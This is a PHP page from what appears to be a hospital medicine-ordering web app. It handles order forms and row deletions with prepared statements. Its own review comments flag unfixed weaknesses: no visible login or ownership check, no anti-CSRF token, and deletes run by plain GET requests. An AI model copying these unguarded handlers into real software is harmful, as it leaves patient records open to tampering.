Current File : /home/btiyawmy/public_html/login.easenup.in//ordercreate.php
<?php
// Page bootstrap: starts the session, then pulls in LoginManager.php and
// DBManager.php from the parent directory and the two local templates.
// NOTE(review): no explicit login or role check is visible in this file.
// Confirm that one of the included files rejects unauthenticated requests
// before the request handlers further down this page run.
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("dashboarddocument.php");
include("header.php");
?>

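<?php
// Request handler for the medicine forms on this page.
//
// - "opdmedicine" posted: records the order through PatientManager::Medicineorder()
//   and PatientManager::Medicine().
// - otherwise, "status" posted: records a medication entry through
//   PatientManager::medimgnt().
// - "statusmedicineva" posted: updates the status of one medicinede row.
//
// Every value below comes straight from the query string or the request body, so it
// is treated as untrusted: array keys are quoted (a bare key is an undefined
// constant, which is a fatal Error on PHP 8), non-scalar values are reduced to '',
// and the UPDATE uses bound parameters instead of string interpolation.
//
// NOTE(review): PatientManager is defined outside this file; confirm that its
// methods also bind their arguments rather than concatenating them into SQL.
// NOTE(review): "status" and "entered_by" are chosen by the client here, and no
// anti-CSRF token is checked before these state-changing calls.
if (session_status() !== PHP_SESSION_ACTIVE) {
    // The page bootstrap has normally started the session already.
    session_start();
}
include("dbconnection.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');

// Read one query-string field as a string; missing or non-scalar values become ''.
$getField = static function ($key) {
    return isset($_GET[$key]) && is_scalar($_GET[$key]) ? (string) $_GET[$key] : '';
};
// Read one request-body field as a string; missing or non-scalar values become ''.
$postField = static function ($key) {
    return isset($_POST[$key]) && is_scalar($_POST[$key]) ? (string) $_POST[$key] : '';
};

if (isset($_POST['opdmedicine'])) {
    PatientManager::Medicineorder(
        $getField('prescriptionid'),
        $getField('patientid'),
        $postField('DRUGS'),
        $postField('Dose'),
        $postField('Frequency'),
        $postField('Quantity'),
        $postField('status'),
        $postField('entered_by')
    );
    PatientManager::Medicine(
        $getField('prescriptionid'),
        $getField('patientid'),
        $postField('DRUGS'),
        $postField('Dose'),
        $postField('Route'),
        $postField('Frequency'),
        $postField('Quantity'),
        $postField('potential'),
        $postField('poa'),
        $postField('status'),
        $postField('Action'),
        $postField('availability'),
        $postField('batchno'),
        $postField('st0'),
        $postField('st1'),
        $postField('st2'),
        $postField('st3'),
        $postField('st4'),
        $postField('st5'),
        $postField('drid'),
        $postField('treatmentid'),
        $postField('entered_by')
    );
} elseif (isset($_POST['status'])) {
    PatientManager::medimgnt(
        $getField('prescriptionid'),
        $getField('patientid'),
        $postField('medicine_id'),
        $postField('DRUGS'),
        $postField('timeslot'),
        $postField('admissiondate'),
        $postField('status'),
        $postField('entered_by')
    );
}

if (isset($_POST['statusmedicineva'])) {
    // Bound parameters keep the request values out of the SQL text.
    $statusStmt = mysqli_prepare(
        $con,
        "UPDATE medicinede SET status=? WHERE prescriptionid=? AND patientid=? AND id=?"
    );
    if ($statusStmt) {
        $newStatus = $postField('status');
        $prescriptionId = $getField('prescriptionid');
        $patientId = $getField('patientid');
        $rowId = $getField('id');
        mysqli_stmt_bind_param($statusStmt, 'ssss', $newStatus, $prescriptionId, $patientId, $rowId);
        mysqli_stmt_execute($statusStmt);
        mysqli_stmt_close($statusStmt);
    }
}

?>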

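<?php
include("dbconnection.php");
// Deletes one medicinede row when "delid" is present in the query string.
// The row id is request-controlled, so it is bound as a parameter instead of being
// interpolated into the statement; the key is quoted because a bare key is an
// undefined constant (a fatal Error on PHP 8).
// NOTE(review): this delete is triggered by a plain GET request with no visible
// ownership check or anti-CSRF token; confirm who may call it and consider POST.
if (isset($_GET['delid'])) {
    $medicineRowId = isset($_GET['id']) && is_scalar($_GET['id']) ? (string) $_GET['id'] : '';
    $deleteStmt = mysqli_prepare($con, "DELETE FROM medicinede WHERE id=?");
    if ($deleteStmt) {
        mysqli_stmt_bind_param($deleteStmt, 's', $medicineRowId);
        mysqli_stmt_execute($deleteStmt);
        mysqli_stmt_close($deleteStmt);
    }
}
?>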


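<?php
include("dbconnection.php");
// Deletes one medication_mng row when "delid" is present in the query string and
// reports success with a browser alert when exactly one row was removed.
// The row id is request-controlled, so it is bound as a parameter instead of being
// interpolated into the statement; the key is quoted because a bare key is an
// undefined constant (a fatal Error on PHP 8).
// NOTE(review): the same "delid"/"id" pair also drives a delete on another table
// earlier in this file; confirm that removing from both tables is intended.
if (isset($_GET['delid'])) {
    $medicationRowId = isset($_GET['id']) && is_scalar($_GET['id']) ? (string) $_GET['id'] : '';
    $undoStmt = mysqli_prepare($con, "DELETE FROM medication_mng WHERE id=?");
    if ($undoStmt) {
        mysqli_stmt_bind_param($undoStmt, 's', $medicationRowId);
        mysqli_stmt_execute($undoStmt);
        if (mysqli_stmt_affected_rows($undoStmt) == 1) {
            echo "<script>alert('Un-done successfully..');</script>";
        }
        mysqli_stmt_close($undoStmt);
    }
}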
?><div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
<div class="">
        <div class="modal-content">
        <div class="contact-form">
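            <?php
            // Loads the active medicinede row selected by the patientid, prescriptionid
            // and id query-string values into $rs1 (null when nothing matches or the
            // query fails). The three values are request-controlled, so they are bound
            // as parameters rather than interpolated into the SQL text.
            // mysqli_stmt_get_result() needs the mysqlnd driver.
            // NOTE(review): no check is visible here that the logged-in user may read
            // this patient's row; confirm where that is enforced.
            $rs1 = null;
            $rowStmt = mysqli_prepare(
                $con,
                "SELECT * FROM medicinede WHERE patientid=? AND prescriptionid=? AND status='Active' AND id=?"
            );
            if ($rowStmt) {
                $rowPatientId = isset($_GET['patientid']) && is_scalar($_GET['patientid']) ? (string) $_GET['patientid'] : '';
                $rowPrescriptionId = isset($_GET['prescriptionid']) && is_scalar($_GET['prescriptionid']) ? (string) $_GET['prescriptionid'] : '';
                $rowId = isset($_GET['id']) && is_scalar($_GET['id']) ? (string) $_GET['id'] : '';
                mysqli_stmt_bind_param($rowStmt, 'sss', $rowPatientId, $rowPrescriptionId, $rowId);
                if (mysqli_stmt_execute($rowStmt)) {
                    $qsql1 = mysqli_stmt_get_result($rowStmt);
                    $rs1 = $qsql1 ? mysqli_fetch_array($qsql1) : null;
                }
                mysqli_stmt_close($rowStmt);
            }

            ?>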
     <form name="opdmedicine" method="post">
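<?php
// Renders the drug-name field and the datalist of stock items for the form.
//
// $rs13 is the medicine_stok row whose medicine_id equals the DRUGS value of the
// selected medicinede row ($rs1). The field and the datalist options are only
// emitted when that DRUGS value is numeric. The options list the medicine_stok rows
// whose admin_id equals the entered_by column of the current user's site_users row.
//
// Changes from the string-built version: the DRUGS key is quoted (a bare key is an
// undefined constant, a fatal Error on PHP 8), all three SELECTs bind their values,
// and every database value written into the page is HTML-escaped so that stored
// text cannot break out of the single-quoted attributes.
// mysqli_stmt_get_result() needs the mysqlnd driver.

// HTML-escapes a value for element content and quoted attributes.
$escape = static function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
// Runs a one-parameter SELECT with the value bound as a string; returns the
// mysqli result, or false when preparing or executing fails.
$selectBound = static function ($link, $query, $value) {
    $stmt = mysqli_prepare($link, $query);
    if (!$stmt) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, 's', $value);
    $result = mysqli_stmt_execute($stmt) ? mysqli_stmt_get_result($stmt) : false;
    mysqli_stmt_close($stmt);
    return $result;
};

$drugId = isset($rs1['DRUGS']) ? (string) $rs1['DRUGS'] : '';
$qsql13 = $selectBound($con, "SELECT * FROM medicine_stok WHERE medicine_id=?", $drugId);
$rs13 = $qsql13 ? mysqli_fetch_array($qsql13) : null;
if (is_numeric($drugId)) {
?>
<label>Drug Name</label> <input onkeyup="this.value = this.value.toUpperCase();" value='<?php echo $escape(isset($rs13['DRUGS_name']) ? $rs13['DRUGS_name'] : '') ?>' onchange="drmdiload(this.value)"  name='DRUGSSS' type='text' list='DRUGS'  readonly/>

<input  value='<?php echo $escape(isset($rs13['medicine_id']) ? $rs13['medicine_id'] : '') ?>'   name='DRUGS' type='hidden' list='DRUGS' />

<datalist name='DRUGS' id='DRUGS'>
 
				<?php
    include("dbconnection.php");
    require_once('../DBManager.php');
    require_once('../LoginManager.php');
    $narayan = LoginManager::currentUser();
    $usertype = LoginManager::getUserTypeByuname("$narayan");
    $qsql1 = $selectBound($con, "SELECT * FROM site_users WHERE userno=?", (string) $usertype);
    if ($qsql1 && ($re = mysqli_fetch_array($qsql1))) {
        $qsql = $selectBound($con, "SELECT * FROM medicine_stok WHERE admin_id=?", (string) $re['entered_by']);
        // NOTE(review): the "Select one..." placeholder is emitted once per stock
        // row, as before; confirm whether it was meant to appear only once.
        while ($qsql && ($rs = mysqli_fetch_array($qsql))) {
            echo " 
<option value>Select one...</option> ";?>

     <option value='<?php echo $escape($rs['medicine_id'])?>' <?php if($rs['medicine_id']==$drugId) echo 'selected="selected"'; ?>><?php echo $escape($rs['DRUGS_name']) ?>-<?php echo $escape($rs['Dose']) ?></option>
                   
          
         <?php 
        }
    }
}
?> 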
  </datalist>	
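<?php
// Dose, Category and Route are copied from database rows ($rs1, $rs13) into
// single-quoted attributes, so each value is HTML-escaped before it is written.
// A missing row yields an empty value instead of a notice.
// NOTE(review): these hidden fields come back from the browser, so the handler
// that receives the form must not treat them as trusted.
?>
<div id='divmedidr'>
						<label>Dose</label>
					<input type='text' value='<?php echo htmlspecialchars((string) (isset($rs1['Dose']) ? $rs1['Dose'] : ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?> Mg' name='Dose' id='dose' class='form-control' >
				<input type='hidden' value='<?php echo htmlspecialchars((string) (isset($rs13['Category']) ? $rs13['Category'] : ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?>' name='Category' id='Category' class='form-control' >
						
				</div>
		
			
	<input type='hidden' value='1' name='Frequency' id='Frequency' class='form-control' >
	<input type='hidden' value='none' name='potential' id='potential' class='form-control' >
	<input type='hidden' value='<?php echo htmlspecialchars((string) (isset($rs1['Route']) ? $rs1['Route'] : ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?>' name='Route' id='Route' class='form-control' >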
	    	    <label>Quantity Requested</label>
	    <input type="text" placeholder="Quantity" name="Quantity" required>
<input type="hidden" name="status" value="Active">
<input type="hidden" name="poa" value="ipd_Medicine" >
	
       <input type="submit" value="Add" name="opdmedicine">
 </form></div></div></div></div></section></div>
    <script>
      // Modal wiring. Each ".button" element shows the element whose id is given in
      // its data-modal attribute; each ".close" element hides its nearest ".modal"
      // ancestor; a click on an element whose class is exactly "modal" hides it.
      let modalBtns = Array.from(document.querySelectorAll(".button"));
      for (const opener of modalBtns) {
        opener.onclick = () => {
          const targetId = opener.getAttribute('data-modal');
          const target = document.getElementById(targetId);
          target.style.display = "block";
        };
      }
      let closeBtns = Array.from(document.querySelectorAll(".close"));
      for (const closer of closeBtns) {
        closer.onclick = () => {
          const owner = closer.closest('.modal');
          owner.style.display = "none";
        };
      }
      window.onclick = (event) => {
        const clicked = event.target;
        if (clicked.className === "modal") {
          clicked.style.display = "none";
        }
      };
    </script>
    <script>
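 /**
  * Fetches the dose fields for a drug from loaddrug.php and places the response
  * inside the element with id "divmedidr".
  *
  * The request object is a local variable (it used to leak into an implicit global
  * shared by every loader on the page), and the value is URL-encoded so that
  * characters such as "&" or "#" cannot alter the query string.
  *
  * The response is inserted as markup, so loaddrug.php must HTML-escape every
  * database or request value it echoes.
  *
  * @param {string} drmeid value sent as the "drmeid" query parameter
  */
 function drmdiload(drmeid)
{
        var xmlhttp;
        if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divmedidr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET", "loaddrug.php?drmeid=" + encodeURIComponent(drmeid), true);
        xmlhttp.send();
}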
          
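 /**
  * Fetches the frequency markup from loadfrequency.php and places the response
  * inside the element with id "frequency".
  *
  * The request object is a local variable (it used to leak into an implicit global
  * shared by every loader on the page), and the value is URL-encoded so that
  * characters such as "&" or "#" cannot alter the query string.
  *
  * The response is inserted as markup, so loadfrequency.php must HTML-escape every
  * database or request value it echoes.
  *
  * @param {string} frid value sent as the "frid" query parameter
  */
 function frequency(frid)
{
        var xmlhttp;
        if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("frequency").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET", "loadfrequency.php?frid=" + encodeURIComponent(frid), true);
        xmlhttp.send();
}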
             
     
</script>
  </body>
</html>



<script>
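 /**
  * Fetches the time-slot markup from loadtimeslot.php and places the response
  * inside the element with id "divmb".
  *
  * The request object is a local variable (it used to leak into an implicit global
  * shared by every loader on the page), and the value is URL-encoded so that
  * characters such as "&" or "#" cannot alter the query string.
  *
  * The response is inserted as markup, so loadtimeslot.php must HTML-escape every
  * database or request value it echoes.
  *
  * @param {string} mbid value sent as the "mbid" query parameter
  */
 function mobile(mbid)
{
        var xmlhttp;
        if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divmb").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET", "loadtimeslot.php?mbid=" + encodeURIComponent(mbid), true);
        xmlhttp.send();
}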
            
     
</script>
